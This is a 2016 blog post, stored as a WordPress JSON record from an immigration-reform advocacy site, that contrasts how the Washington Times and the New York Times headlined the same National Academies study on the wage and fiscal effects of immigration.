{"id":13228,"date":"2016-09-23T12:03:12","date_gmt":"2016-09-23T16:03:12","guid":{"rendered":"http:\/\/live-immigrationreform.pantheonsite.io\/?p=13228"},"modified":"2018-12-28T13:14:38","modified_gmt":"2018-12-28T18:14:38","slug":"which-story-do-you-want-to-read","status":"publish","type":"post","link":"https:\/\/www.immigrationreform.com\/2016\/09\/23\/which-story-do-you-want-to-read\/","title":{"rendered":"Which Story Do You Want to Read?"},"content":{"rendered":"<p>\u201cMass immigration costs government $296 billion a year, depresses wages\u201d<\/p>\n<p>Washington Times (WT) September 22, 2016, or<\/p>\n<p><span style=\"line-height: 1.5em;\">\u201cImmigrants Aren\u2019t Taking Americans\u2019 Jobs, New Study Finds\u201d,<\/span><\/p>\n<p>New York Times (NYT), September 22, 2016<\/p>\n<p><span style=\"line-height: 1.5em;\">Surprise! \u00a0Both headlines are about the findings of a new report released by the <\/span><a style=\"line-height: 1.5em;\" href=\"http:\/\/www.nationalacademies.org\/\">National Academies of Sciences, Engineering and Medicine<\/a><span style=\"line-height: 1.5em;\">, The study, according to the NYT, says that immigrants are not taking the jobs away from natives \u201c&#8230;but with some caveats.\u201d<\/span><\/p>\n<p><span style=\"line-height: 1.5em;\">The caveats include the fact that low wage immigrants (not distinguishing between legal and illegal immigrants) reduce wages and opportunities for low-wage native workers and for earlier immigrants. Another finding in the NYT account is that immigrants cost the federal and local governments more than they contribute in taxes [the reason for the WT headline].
